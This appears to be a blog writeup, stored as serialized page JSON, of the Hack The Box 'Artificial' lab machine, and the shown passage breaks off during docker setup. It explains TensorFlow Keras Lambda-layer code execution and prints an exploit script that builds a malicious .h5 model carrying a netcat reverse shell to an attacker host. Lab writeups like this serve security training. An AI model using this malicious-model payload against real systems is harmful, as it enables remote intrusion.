[{"data":1,"prerenderedAt":2350},["ShallowReactive",2],{"\u002F2025\u002Fhtb-artificial-writeup":3,"surround-\u002F2025\u002Fhtb-artificial-writeup":2341},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"recommend":14,"draft":6,"readingTime":15,"body":20,"_type":2334,"_id":2335,"_source":2336,"_file":2337,"_stem":2338,"_extension":2339,"_original_dir":2340},"\u002F2025\u002Fhtb-artificial-writeup","2025",false,"","HTB - Artificial","A detailed writeup on how to solve the Hack The Box 'Artificial' machine. This post covers gaining initial access through a TensorFlow model RCE, escalating privileges to the 'gael' user by cracking a password found in a database, and finally achieving root access by exploiting a 'backrest' backup service to retrieve the root user's SSH key.","2025-10-29T11:40:48.000Z","https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002Fthumbnail.jpg",[13],"CTF",true,{"text":16,"minutes":17,"time":18,"words":19},"7 min read",6.75,405000,1350,{"type":21,"children":22,"toc":2324},"root",[23,29,45,52,56,60,101,105,110,114,119,147,160,164,169,188,210,214,220,232,237,248,262,266,286,675,704,708,717,722,910,915,1105,1109,1113,1126,1151,1155,1160,1243,1247,1253,1260,1272,1276,1288,1296,1300,1305,1309,1347,1351,1362,1368,1382,1386,1390,1395,1428,1432,1437,1448,1493,1505,1509,1522,1526,1547,1552,1565,1569,1605,1609,1614,1656,1660,1664,1677,1767,1771,1775,1779,1807,2096,2110,2114,2118,2122,2135,2178,2182,2195,2199,2206,2211,2231,2235,2239,2247,2252,2256,2264,2269,2273,2286,2290,2295,2299,2304,2308,2312,2318],{"type":24,"tag":25,"props":26,"children":28},"element","pic",{"src":27},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F1.jpg",[],{"type":24,"tag":30,"props":31,"children":32},"p",{},[33,36],{"type":34,"value":35},"text","Target IP: 
",{"type":24,"tag":37,"props":38,"children":42},"a",{"href":39,"rel":40},"https:\u002F\u002Fapp.hackthebox.com\u002Fmachines\u002FArtificial",[41],"nofollow",[43],{"type":34,"value":44},"10.10.11.74 - artificial.htb",{"type":24,"tag":46,"props":47,"children":49},"h2",{"id":48},"reconnaissance",[50],{"type":34,"value":51},"Reconnaissance",{"type":24,"tag":25,"props":53,"children":55},{"src":54},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F2.jpg",[],{"type":24,"tag":25,"props":57,"children":59},{"src":58},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F3.jpg",[],{"type":24,"tag":30,"props":61,"children":62},{},[63,65,72,74,80,82,91,93,99],{"type":34,"value":64},"As a result of our scans, we see that ports ",{"type":24,"tag":66,"props":67,"children":69},"code",{"className":68},[],[70],{"type":34,"value":71},"22",{"type":34,"value":73}," and ",{"type":24,"tag":66,"props":75,"children":77},{"className":76},[],[78],{"type":34,"value":79},"80",{"type":34,"value":81}," are open and we need to redirect to ",{"type":24,"tag":66,"props":83,"children":88},{"className":84,"id":86,"style":87},[85],"example-info","just-like-this","color: #4DFFBE",[89],{"type":34,"value":90},"artificial.htb",{"type":34,"value":92},". We can easily do this by adding it to the ",{"type":24,"tag":66,"props":94,"children":96},{"className":95},[],[97],{"type":34,"value":98},"\u002Fetc\u002Fhosts",{"type":34,"value":100}," file. 
Now let's take a look at the site.",{"type":24,"tag":25,"props":102,"children":104},{"src":103},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F4.jpg",[],{"type":24,"tag":30,"props":106,"children":107},{},[108],{"type":34,"value":109},"From the site, we understand that it deals with AI, such as creating AI models.",{"type":24,"tag":25,"props":111,"children":113},{"src":112},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F5.jpg",[],{"type":24,"tag":30,"props":115,"children":116},{},[117],{"type":34,"value":118},"We can register an account from the register section of the site. I registered with the following information:",{"type":24,"tag":120,"props":121,"children":122},"ul",{},[123,129,138],{"type":24,"tag":124,"props":125,"children":126},"li",{},[127],{"type":34,"value":128},"test",{"type":24,"tag":124,"props":130,"children":131},{},[132],{"type":24,"tag":37,"props":133,"children":135},{"href":134},"mailto:test@example.com",[136],{"type":34,"value":137},"test@example.com",{"type":24,"tag":124,"props":139,"children":140},{},[141,143],{"type":34,"value":142},"test12345",{"type":24,"tag":25,"props":144,"children":146},{"src":145},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F6.jpg",[],{"type":24,"tag":30,"props":148,"children":149},{},[150,152,158],{"type":34,"value":151},"An interface appears where we can upload a model. 
When we try to upload a file here, we see that ",{"type":24,"tag":66,"props":153,"children":155},{"className":154},[],[156],{"type":34,"value":157},".h5",{"type":34,"value":159}," files are accepted.",{"type":24,"tag":25,"props":161,"children":163},{"src":162},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F7.jpg",[],{"type":24,"tag":30,"props":165,"children":166},{},[167],{"type":34,"value":168},"So we need to look into what an .h5 file is and whether loading one can lead to code execution.",{"type":24,"tag":170,"props":171,"children":173},"alert",{"type":172},"info",[174,183],{"type":24,"tag":175,"props":176,"children":177},"template",{"v-slot:title":7},[178],{"type":24,"tag":30,"props":179,"children":180},{},[181],{"type":34,"value":182},"What is .h5?",{"type":24,"tag":30,"props":184,"children":185},{},[186],{"type":34,"value":187},"The .h5 file format is a data storage format that uses the HDF5 (Hierarchical Data Format 5) structure. 
It is used to store large and complex data (such as artificial intelligence models or scientific data) hierarchically and efficiently.",{"type":24,"tag":30,"props":189,"children":190},{},[191,193,199,201,208],{"type":34,"value":192},"Since we are dealing with artificial intelligence, when we do a search like ",{"type":24,"tag":66,"props":194,"children":196},{"className":195},[],[197],{"type":34,"value":198},"h5 model command execute",{"type":34,"value":200}," on Google, we come across ",{"type":24,"tag":37,"props":202,"children":205},{"href":203,"rel":204},"https:\u002F\u002Fsplint.gitbook.io\u002Fcyberblog\u002Fsecurity-research\u002Ftensorflow-remote-code-execution-with-malicious-model",[41],[206],{"type":34,"value":207},"this",{"type":34,"value":209}," site.",{"type":24,"tag":25,"props":211,"children":213},{"src":212},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F8.jpg",[],{"type":24,"tag":46,"props":215,"children":217},{"id":216},"initial-access",[218],{"type":34,"value":219},"Initial Access",{"type":24,"tag":30,"props":221,"children":222},{},[223,225,230],{"type":34,"value":224},"And we see that we can perform RCE with these ",{"type":24,"tag":66,"props":226,"children":228},{"className":227},[],[229],{"type":34,"value":157},{"type":34,"value":231}," models.",{"type":24,"tag":30,"props":233,"children":234},{},[235],{"type":34,"value":236},"This is not a \"TensorFlow vulnerability\". It is a risk inherent in a feature of TensorFlow. TensorFlow's own documentation also warns about this: \"Think of TensorFlow models as programs and don't run models from untrusted sources.\"",{"type":24,"tag":30,"props":238,"children":239},{},[240,242],{"type":34,"value":241},"The risk stems from the fact that TensorFlow's Keras Lambda layer allows arbitrary Python code to be wrapped and saved as part of a model. 
An attacker can embed a malicious Lambda layer containing operating system commands (for example, a reverse shell) into the model. When a victim application loads this model with the load_model() function, the embedded code is deserialized and runs inside the process that loads the model, leading to remote code execution (RCE). ",{"type":24,"tag":37,"props":243,"children":245},{"href":203,"rel":244},[41],[246],{"type":34,"value":247},"(detailed review)",{"type":24,"tag":30,"props":249,"children":250},{},[251,253,260],{"type":34,"value":252},"To exploit this vulnerability, we will use the exploit from ",{"type":24,"tag":37,"props":254,"children":257},{"href":255,"rel":256},"https:\u002F\u002Fgithub.com\u002FSplinter0\u002Ftensorflow-rce",[41],[258],{"type":34,"value":259},"this GitHub repo",{"type":34,"value":261},". This GitHub repo is already mentioned on the research page we reviewed above.",{"type":24,"tag":25,"props":263,"children":265},{"src":264},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F9.jpg",[],{"type":24,"tag":30,"props":267,"children":268},{},[269,271,276,278,284],{"type":34,"value":270},"The logic is simple: we will create an ",{"type":24,"tag":66,"props":272,"children":274},{"className":273},[],[275],{"type":34,"value":157},{"type":34,"value":277}," model file with our reverse shell in it using ",{"type":24,"tag":66,"props":279,"children":281},{"className":280},[],[282],{"type":34,"value":283},"exploit.py",{"type":34,"value":285},". 
And when we upload this model to the target, we will automatically get a reverse shell.",{"type":24,"tag":287,"props":288,"children":292},"pre",{"code":289,"filename":283,"language":290,"meta":7,"className":291,"style":7},"import tensorflow as tf\n\ndef exploit(x):\n    import os\n    os.system(\"rm -f \u002Ftmp\u002Ff;mknod \u002Ftmp\u002Ff p;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc \u003Cip> 1234 >\u002Ftmp\u002Ff\")\n    return x\n\nmodel = tf.keras.Sequential()\nmodel.add(tf.keras.layers.Input(shape=(64,)))\nmodel.add(tf.keras.layers.Lambda(exploit))\nmodel.compile()\nmodel.save(\"exploit.h5\")\n","py","language-py shiki shiki-themes catppuccin-latte one-dark-pro",[293],{"type":24,"tag":66,"props":294,"children":295},{"__ignoreMap":7},[296,324,333,365,379,414,428,436,479,561,624,645],{"type":24,"tag":297,"props":298,"children":301},"span",{"class":299,"line":300},"line",1,[302,308,314,319],{"type":24,"tag":297,"props":303,"children":305},{"style":304},"--shiki-default:#8839EF;--shiki-dark:#C678DD",[306],{"type":34,"value":307},"import",{"type":24,"tag":297,"props":309,"children":311},{"style":310},"--shiki-default:#4C4F69;--shiki-dark:#ABB2BF",[312],{"type":34,"value":313}," tensorflow ",{"type":24,"tag":297,"props":315,"children":316},{"style":304},[317],{"type":34,"value":318},"as",{"type":24,"tag":297,"props":320,"children":321},{"style":310},[322],{"type":34,"value":323}," 
tf\n",{"type":24,"tag":297,"props":325,"children":327},{"class":299,"line":326},2,[328],{"type":24,"tag":297,"props":329,"children":330},{"emptyLinePlaceholder":14},[331],{"type":34,"value":332},"\n",{"type":24,"tag":297,"props":334,"children":336},{"class":299,"line":335},3,[337,342,348,354,360],{"type":24,"tag":297,"props":338,"children":339},{"style":304},[340],{"type":34,"value":341},"def",{"type":24,"tag":297,"props":343,"children":345},{"style":344},"--shiki-default:#1E66F5;--shiki-default-font-style:italic;--shiki-dark:#61AFEF;--shiki-dark-font-style:inherit",[346],{"type":34,"value":347}," exploit",{"type":24,"tag":297,"props":349,"children":351},{"style":350},"--shiki-default:#7C7F93;--shiki-dark:#ABB2BF",[352],{"type":34,"value":353},"(",{"type":24,"tag":297,"props":355,"children":357},{"style":356},"--shiki-default:#E64553;--shiki-default-font-style:italic;--shiki-dark:#D19A66;--shiki-dark-font-style:italic",[358],{"type":34,"value":359},"x",{"type":24,"tag":297,"props":361,"children":362},{"style":350},[363],{"type":34,"value":364},"):\n",{"type":24,"tag":297,"props":366,"children":368},{"class":299,"line":367},4,[369,374],{"type":24,"tag":297,"props":370,"children":371},{"style":304},[372],{"type":34,"value":373},"    import",{"type":24,"tag":297,"props":375,"children":376},{"style":310},[377],{"type":34,"value":378}," os\n",{"type":24,"tag":297,"props":380,"children":382},{"class":299,"line":381},5,[383,388,393,399,403,409],{"type":24,"tag":297,"props":384,"children":385},{"style":310},[386],{"type":34,"value":387},"    
os",{"type":24,"tag":297,"props":389,"children":390},{"style":350},[391],{"type":34,"value":392},".",{"type":24,"tag":297,"props":394,"children":396},{"style":395},"--shiki-default:#1E66F5;--shiki-dark:#61AFEF",[397],{"type":34,"value":398},"system",{"type":24,"tag":297,"props":400,"children":401},{"style":350},[402],{"type":34,"value":353},{"type":24,"tag":297,"props":404,"children":406},{"style":405},"--shiki-default:#40A02B;--shiki-dark:#98C379",[407],{"type":34,"value":408},"\"rm -f \u002Ftmp\u002Ff;mknod \u002Ftmp\u002Ff p;cat \u002Ftmp\u002Ff|\u002Fbin\u002Fsh -i 2>&1|nc \u003Cip> 1234 >\u002Ftmp\u002Ff\"",{"type":24,"tag":297,"props":410,"children":411},{"style":350},[412],{"type":34,"value":413},")\n",{"type":24,"tag":297,"props":415,"children":417},{"class":299,"line":416},6,[418,423],{"type":24,"tag":297,"props":419,"children":420},{"style":304},[421],{"type":34,"value":422},"    return",{"type":24,"tag":297,"props":424,"children":425},{"style":310},[426],{"type":34,"value":427}," x\n",{"type":24,"tag":297,"props":429,"children":431},{"class":299,"line":430},7,[432],{"type":24,"tag":297,"props":433,"children":434},{"emptyLinePlaceholder":14},[435],{"type":34,"value":332},{"type":24,"tag":297,"props":437,"children":439},{"class":299,"line":438},8,[440,445,451,456,460,465,469,474],{"type":24,"tag":297,"props":441,"children":442},{"style":310},[443],{"type":34,"value":444},"model ",{"type":24,"tag":297,"props":446,"children":448},{"style":447},"--shiki-default:#179299;--shiki-dark:#56B6C2",[449],{"type":34,"value":450},"=",{"type":24,"tag":297,"props":452,"children":453},{"style":310},[454],{"type":34,"value":455}," 
tf",{"type":24,"tag":297,"props":457,"children":458},{"style":350},[459],{"type":34,"value":392},{"type":24,"tag":297,"props":461,"children":462},{"style":310},[463],{"type":34,"value":464},"keras",{"type":24,"tag":297,"props":466,"children":467},{"style":350},[468],{"type":34,"value":392},{"type":24,"tag":297,"props":470,"children":471},{"style":395},[472],{"type":34,"value":473},"Sequential",{"type":24,"tag":297,"props":475,"children":476},{"style":350},[477],{"type":34,"value":478},"()\n",{"type":24,"tag":297,"props":480,"children":482},{"class":299,"line":481},9,[483,488,492,497,501,506,510,514,518,523,527,532,536,542,546,550,556],{"type":24,"tag":297,"props":484,"children":485},{"style":310},[486],{"type":34,"value":487},"model",{"type":24,"tag":297,"props":489,"children":490},{"style":350},[491],{"type":34,"value":392},{"type":24,"tag":297,"props":493,"children":494},{"style":395},[495],{"type":34,"value":496},"add",{"type":24,"tag":297,"props":498,"children":499},{"style":350},[500],{"type":34,"value":353},{"type":24,"tag":297,"props":502,"children":503},{"style":310},[504],{"type":34,"value":505},"tf",{"type":24,"tag":297,"props":507,"children":508},{"style":350},[509],{"type":34,"value":392},{"type":24,"tag":297,"props":511,"children":512},{"style":310},[513],{"type":34,"value":464},{"type":24,"tag":297,"props":515,"children":516},{"style":350},[517],{"type":34,"value":392},{"type":24,"tag":297,"props":519,"children":520},{"style":310},[521],{"type":34,"value":522},"layers",{"type":24,"tag":297,"props":524,"children":525},{"style":350},[526],{"type":34,"value":392},{"type":24,"tag":297,"props":528,"children":529},{"style":395},[530],{"type":34,"value":531},"Input",{"type":24,"tag":297,"props":533,"children":534},{"style":350},[535],{"type":34,"value":353},{"type":24,"tag":297,"props":537,"children":539},{"style":538},"--shiki-default:#E64553;--shiki-default-font-style:italic;--shiki-dark:#E06C75;--shiki-dark-font-style:italic",[540],{"type":34,"value":541},
"shape",{"type":24,"tag":297,"props":543,"children":544},{"style":447},[545],{"type":34,"value":450},{"type":24,"tag":297,"props":547,"children":548},{"style":350},[549],{"type":34,"value":353},{"type":24,"tag":297,"props":551,"children":553},{"style":552},"--shiki-default:#FE640B;--shiki-dark:#D19A66",[554],{"type":34,"value":555},"64",{"type":24,"tag":297,"props":557,"children":558},{"style":350},[559],{"type":34,"value":560},",)))\n",{"type":24,"tag":297,"props":562,"children":564},{"class":299,"line":563},10,[565,569,573,577,581,585,589,593,597,601,605,610,614,619],{"type":24,"tag":297,"props":566,"children":567},{"style":310},[568],{"type":34,"value":487},{"type":24,"tag":297,"props":570,"children":571},{"style":350},[572],{"type":34,"value":392},{"type":24,"tag":297,"props":574,"children":575},{"style":395},[576],{"type":34,"value":496},{"type":24,"tag":297,"props":578,"children":579},{"style":350},[580],{"type":34,"value":353},{"type":24,"tag":297,"props":582,"children":583},{"style":310},[584],{"type":34,"value":505},{"type":24,"tag":297,"props":586,"children":587},{"style":350},[588],{"type":34,"value":392},{"type":24,"tag":297,"props":590,"children":591},{"style":310},[592],{"type":34,"value":464},{"type":24,"tag":297,"props":594,"children":595},{"style":350},[596],{"type":34,"value":392},{"type":24,"tag":297,"props":598,"children":599},{"style":310},[600],{"type":34,"value":522},{"type":24,"tag":297,"props":602,"children":603},{"style":350},[604],{"type":34,"value":392},{"type":24,"tag":297,"props":606,"children":607},{"style":395},[608],{"type":34,"value":609},"Lambda",{"type":24,"tag":297,"props":611,"children":612},{"style":350},[613],{"type":34,"value":353},{"type":24,"tag":297,"props":615,"children":616},{"style":310},[617],{"type":34,"value":618},"exploit",{"type":24,"tag":297,"props":620,"children":621},{"style":350},[622],{"type":34,"value":623},"))\n",{"type":24,"tag":297,"props":625,"children":627},{"class":299,"line":626},11,[628,632,636,641],{
"type":24,"tag":297,"props":629,"children":630},{"style":310},[631],{"type":34,"value":487},{"type":24,"tag":297,"props":633,"children":634},{"style":350},[635],{"type":34,"value":392},{"type":24,"tag":297,"props":637,"children":638},{"style":395},[639],{"type":34,"value":640},"compile",{"type":24,"tag":297,"props":642,"children":643},{"style":350},[644],{"type":34,"value":478},{"type":24,"tag":297,"props":646,"children":648},{"class":299,"line":647},12,[649,653,657,662,666,671],{"type":24,"tag":297,"props":650,"children":651},{"style":310},[652],{"type":34,"value":487},{"type":24,"tag":297,"props":654,"children":655},{"style":350},[656],{"type":34,"value":392},{"type":24,"tag":297,"props":658,"children":659},{"style":395},[660],{"type":34,"value":661},"save",{"type":24,"tag":297,"props":663,"children":664},{"style":350},[665],{"type":34,"value":353},{"type":24,"tag":297,"props":667,"children":668},{"style":405},[669],{"type":34,"value":670},"\"exploit.h5\"",{"type":24,"tag":297,"props":672,"children":673},{"style":350},[674],{"type":34,"value":413},{"type":24,"tag":30,"props":676,"children":677},{},[678,680,686,688,694,696,702],{"type":34,"value":679},"To create this model, we need ",{"type":24,"tag":66,"props":681,"children":683},{"className":682},[],[684],{"type":34,"value":685},"tensorflow",{"type":34,"value":687},". Since I am currently on a device with ",{"type":24,"tag":66,"props":689,"children":691},{"className":690},[],[692],{"type":34,"value":693},"arm",{"type":34,"value":695}," architecture, I will proceed via docker. The model upload page already gave us a ",{"type":24,"tag":66,"props":697,"children":699},{"className":698},[],[700],{"type":34,"value":701},"dockerfile",{"type":34,"value":703},". 
This way, we will easily create the necessary environment.",{"type":24,"tag":25,"props":705,"children":707},{"src":706},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-artificial-writeup\u002F10.jpg",[],{"type":24,"tag":287,"props":709,"children":712},{"code":710,"filename":711,"meta":7},"FROM python:3.8-slim\n\nWORKDIR \u002Fcode\n\nRUN apt-get update && \\\n    apt-get install -y curl && \\\n    curl -k -LO https:\u002F\u002Ffiles.pythonhosted.org\u002Fpackages\u002F65\u002Fad\u002F4e090ca3b4de53404df9d1247c8a371346737862cfe539e7516fd23149a4\u002Ftensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl && \\\n    rm -rf \u002Fvar\u002Flib\u002Fapt\u002Flists\u002F*\n\nRUN pip install .\u002Ftensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl\n\nENTRYPOINT [\"\u002Fbin\u002Fbash\"]\n\n","Dockerfile",[713],{"type":24,"tag":66,"props":714,"children":715},{"__ignoreMap":7},[716],{"type":34,"value":710},{"type":24,"tag":30,"props":718,"children":719},{},[720],{"type":34,"value":721},"So let's go step by step and set up our docker environment and create our model.",{"type":24,"tag":287,"props":723,"children":727},{"code":724,"language":725,"meta":7,"className":726,"style":7},"sudo apt update                         # Update package lists\nsudo apt install docker.io docker-cli -y # Install Docker packages and CLI\nsudo systemctl start docker             # Start the Docker service now\nsudo systemctl enable docker            # Start Docker automatically when the system reboots\n\nsudo apt install qemu-user-static binfmt-support -y # Tools required to run Linux\u002Famd64 images on different CPU architectures (e.g. 
ARM)\nsudo systemctl restart docker           # We will restart Docker after the binfmt\u002Fqemu installation\n","bash","language-bash shiki shiki-themes catppuccin-latte one-dark-pro",[728],{"type":24,"tag":66,"props":729,"children":730},{"__ignoreMap":7},[731,755,792,819,844,851,885],{"type":24,"tag":297,"props":732,"children":733},{"class":299,"line":300},[734,739,744,749],{"type":24,"tag":297,"props":735,"children":736},{"style":344},[737],{"type":34,"value":738},"sudo",{"type":24,"tag":297,"props":740,"children":741},{"style":405},[742],{"type":34,"value":743}," apt",{"type":24,"tag":297,"props":745,"children":746},{"style":405},[747],{"type":34,"value":748}," update",{"type":24,"tag":297,"props":750,"children":752},{"style":751},"--shiki-default:#9CA0B0;--shiki-default-font-style:italic;--shiki-dark:#7F848E;--shiki-dark-font-style:italic",[753],{"type":34,"value":754},"                         # Update package lists\n",{"type":24,"tag":297,"props":756,"children":757},{"class":299,"line":326},[758,762,766,771,776,781,787],{"type":24,"tag":297,"props":759,"children":760},{"style":344},[761],{"type":34,"value":738},{"type":24,"tag":297,"props":763,"children":764},{"style":405},[765],{"type":34,"value":743},{"type":24,"tag":297,"props":767,"children":768},{"style":405},[769],{"type":34,"value":770}," install",{"type":24,"tag":297,"props":772,"children":773},{"style":405},[774],{"type":34,"value":775}," docker.io",{"type":24,"tag":297,"props":777,"children":778},{"style":405},[779],{"type":34,"value":780}," docker-cli",{"type":24,"tag":297,"props":782,"children":784},{"style":783},"--shiki-default:#40A02B;--shiki-dark:#D19A66",[785],{"type":34,"value":786}," -y",{"type":24,"tag":297,"props":788,"children":789},{"style":751},[790],{"type":34,"value":791}," # Install Docker packages and 
CLI\n",{"type":24,"tag":297,"props":793,"children":794},{"class":299,"line":335},[795,799,804,809,814],{"type":24,"tag":297,"props":796,"children":797},{"style":344},[798],{"type":34,"value":738},{"type":24,"tag":297,"props":800,"children":801},{"style":405},[802],{"type":34,"value":803}," systemctl",{"type":24,"tag":297,"props":805,"children":806},{"style":405},[807],{"type":34,"value":808}," start",{"type":24,"tag":297,"props":810,"children":811},{"style":405},[812],{"type":34,"value":813}," docker",{"type":24,"tag":297,"props":815,"children":816},{"style":751},[817],{"type":34,"value":818},"             # Start the Docker service now\n",{"type":24,"tag":297,"props":820,"children":821},{"class":299,"line":367},[822,826,830,835,839],{"type":24,"tag":297,"props":823,"children":824},{"style":344},[825],{"type":34,"value":738},{"type":24,"tag":297,"props":827,"children":828},{"style":405},[829],{"type":34,"value":803},{"type":24,"tag":297,"props":831,"children":832},{"style":405},[833],{"type":34,"value":834}," enable",{"type":24,"tag":297,"props":836,"children":837},{"style":405},[838],{"type":34,"value":813},{"type":24,"tag":297,"props":840,"children":841},{"style":751},[842],{"type":34,"value":843},"            # Start Docker automatically when the system reboots\n",{"type":24,"tag":297,"props":845,"children":846},{"class":299,"line":381},[847],{"type":24,"tag":297,"props":848,"children":849},{"emptyLinePlaceholder":14},[850],{"type":34,"value":332},{"type":24,"tag":297,"props":852,"children":853},{"class":299,"line":416},[854,858,862,866,871,876,880],{"type":24,"tag":297,"props":855,"children":856},{"style":344},[857],{"type":34,"value":738},{"type":24,"tag":297,"props":859,"children":860},{"style":405},[861],{"type":34,"value":743},{"type":24,"tag":297,"props":863,"children":864},{"style":405},[865],{"type":34,"value":770},{"type":24,"tag":297,"props":867,"children":868},{"style":405},[869],{"type":34,"value":870}," 
qemu-user-static",{"type":24,"tag":297,"props":872,"children":873},{"style":405},[874],{"type":34,"value":875}," binfmt-support",{"type":24,"tag":297,"props":877,"children":878},{"style":783},[879],{"type":34,"value":786},{"type":24,"tag":297,"props":881,"children":882},{"style":751},[883],{"type":34,"value":884}," # Tools required to run Linux\u002Famd64 images on different CPU architectures (e.g. ARM)\n",{"type":24,"tag":297,"props":886,"children":887},{"class":299,"line":430},[888,892,896,901,905],{"type":24,"tag":297,"props":889,"children":890},{"style":344},[891],{"type":34,"value":738},{"type":24,"tag":297,"props":893,"children":894},{"style":405},[895],{"type":34,"value":803},{"type":24,"tag":297,"props":897,"children":898},{"style":405},[899],{"type":34,"value":900}," restart",{"type":24,"tag":297,"props":902,"children":903},{"style":405},[904],{"type":34,"value":813},{"type":24,"tag":297,"props":906,"children":907},{"style":751},[908],{"type":34,"value":909},"           # We will restart Docker after the binfmt\u002Fqemu installation\n",{"type":24,"tag":30,"props":911,"children":912},{},[913],{"type":34,"value":914},"Now that we have done the necessary installations, let's create the correct image and continue from our container.",{"type":24,"tag":287,"props":916,"children":918},{"code":917,"language":725,"meta":7,"className":726,"style":7},"sudo docker build --platform linux\u002Famd64 -t artificial .\n# Create an image named \"artificial\" using the Dockerfile in the current directory\n# --platform linux\u002Famd64 : produce an image for the x86_64 target architecture (provides compatibility with qemu if you are on an ARM machine)\n# -t artificial : give the image the tag\u002Fname \"artificial\"\n# . 
: The directory where the Dockerfile and context are located\n\nsudo docker run -it --rm -v \"$(pwd):\u002Fcode\" artificial\n# Start an interactive container from the created \"artificial\" image\n# -it : open an interactive terminal (like bash)\n# --rm : automatically delete when the container is closed (for temporary use)\n# -v \"$(pwd):\u002Fcode\" : mount the current directory to the \u002Fcode directory inside the container (to share files)\n# artificial : the name of the image to run\n",[919],{"type":24,"tag":66,"props":920,"children":921},{"__ignoreMap":7},[922,963,971,979,987,995,1002,1065,1073,1081,1089,1097],{"type":24,"tag":297,"props":923,"children":924},{"class":299,"line":300},[925,929,933,938,943,948,953,958],{"type":24,"tag":297,"props":926,"children":927},{"style":344},[928],{"type":34,"value":738},{"type":24,"tag":297,"props":930,"children":931},{"style":405},[932],{"type":34,"value":813},{"type":24,"tag":297,"props":934,"children":935},{"style":405},[936],{"type":34,"value":937}," build",{"type":24,"tag":297,"props":939,"children":940},{"style":783},[941],{"type":34,"value":942}," --platform",{"type":24,"tag":297,"props":944,"children":945},{"style":405},[946],{"type":34,"value":947}," linux\u002Famd64",{"type":24,"tag":297,"props":949,"children":950},{"style":783},[951],{"type":34,"value":952}," -t",{"type":24,"tag":297,"props":954,"children":955},{"style":405},[956],{"type":34,"value":957}," artificial",{"type":24,"tag":297,"props":959,"children":960},{"style":405},[961],{"type":34,"value":962}," .\n",{"type":24,"tag":297,"props":964,"children":965},{"class":299,"line":326},[966],{"type":24,"tag":297,"props":967,"children":968},{"style":751},[969],{"type":34,"value":970},"# Create an image named \"artificial\" using the Dockerfile in the current directory\n",{"type":24,"tag":297,"props":972,"children":973},{"class":299,"line":335},[974],{"type":24,"tag":297,"props":975,"children":976},{"style":751},[977],{"type":34,"value":978},"# --platform 
linux\u002Famd64 : produce an image for the x86_64 target architecture (provides compatibility with qemu if you are on an ARM machine)\n",{"type":24,"tag":297,"props":980,"children":981},{"class":299,"line":367},[982],{"type":24,"tag":297,"props":983,"children":984},{"style":751},[985],{"type":34,"value":986},"# -t artificial : give the image the tag\u002Fname \"artificial\"\n",{"type":24,"tag":297,"props":988,"children":989},{"class":299,"line":381},[990],{"type":24,"tag":297,"props":991,"children":992},{"style":751},[993],{"type":34,"value":994},"# . : The directory where the Dockerfile and context are located\n",{"type":24,"tag":297,"props":996,"children":997},{"class":299,"line":416},[998],{"type":24,"tag":297,"props":999,"children":1000},{"emptyLinePlaceholder":14},[1001],{"type":34,"value":332},{"type":24,"tag":297,"props":1003,"children":1004},{"class":299,"line":430},[1005,1009,1013,1018,1023,1028,1033,1038,1044,1050,1055,1060],{"type":24,"tag":297,"props":1006,"children":1007},{"style":344},[1008],{"type":34,"value":738},{"type":24,"tag":297,"props":1010,"children":1011},{"style":405},[1012],{"type":34,"value":813},{"type":24,"tag":297,"props":1014,"children":1015},{"style":405},[1016],{"type":34,"value":1017}," run",{"type":24,"tag":297,"props":1019,"children":1020},{"style":783},[1021],{"type":34,"value":1022}," -it",{"type":24,"tag":297,"props":1024,"children":1025},{"style":783},[1026],{"type":34,"value":1027}," --rm",{"type":24,"tag":297,"props":1029,"children":1030},{"style":783},[1031],{"type":34,"value":1032}," -v",{"type":24,"tag":297,"props":1034,"children":1035},{"style":405},[1036],{"type":34,"value":1037}," 
\"",{"type":24,"tag":297,"props":1039,"children":1041},{"style":1040},"--shiki-default:#7C7F93;--shiki-dark:#98C379",[1042],{"type":34,"value":1043},"$(",{"type":24,"tag":297,"props":1045,"children":1047},{"style":1046},"--shiki-default:#D20F39;--shiki-default-font-style:italic;--shiki-dark:#56B6C2;--shiki-dark-font-style:inherit",[1048],{"type":34,"value":1049},"pwd",{"type":24,"tag":297,"props":1051,"children":1052},{"style":1040},[1053],{"type":34,"value":1054},")",{"type":24,"tag":297,"props":1056,"children":1057},{"style":405},[1058],{"type":34,"value":1059},":\u002Fcode\"",{"type":24,"tag":297,"props":1061,"children":1062},{"style":405},[1063],{"type":34,"value":1064}," artificial\n",{"type":24,"tag":297,"props":1066,"children":1067},{"class":299,"line":438},[1068],{"type":24,"tag":297,"props":1069,"children":1070},{"style":751},[1071],{"type":34,"value":1072},"# Start an interactive container from the created \"artificial\" image\n",{"type":24,"tag":297,"props":1074,"children":1075},{"class":299,"line":481},[1076],{"type":24,"tag":297,"props":1077,"children":1078},{"style":751},[1079],{"type":34,"value":1080},"# -it : open an interactive terminal (like bash)\n",{"type":24,"tag":297,"props":1082,"children":1083},{"class":299,"line":563},[1084],{"type":24,"tag":297,"props":1085,"children":1086},{"style":751},[1087],{"type":34,"value":1088},"# --rm : automatically delete when the container is closed (for temporary use)\n",{"type":24,"tag":297,"props":1090,"children":1091},{"class":299,"line":626},[1092],{"type":24,"tag":297,"props":1093,"children":1094},{"style":751},[1095],{"type":34,"value":1096},"# -v \"$(pwd):\u002Fcode\" : mount the current directory to the \u002Fcode directory inside the container (to share 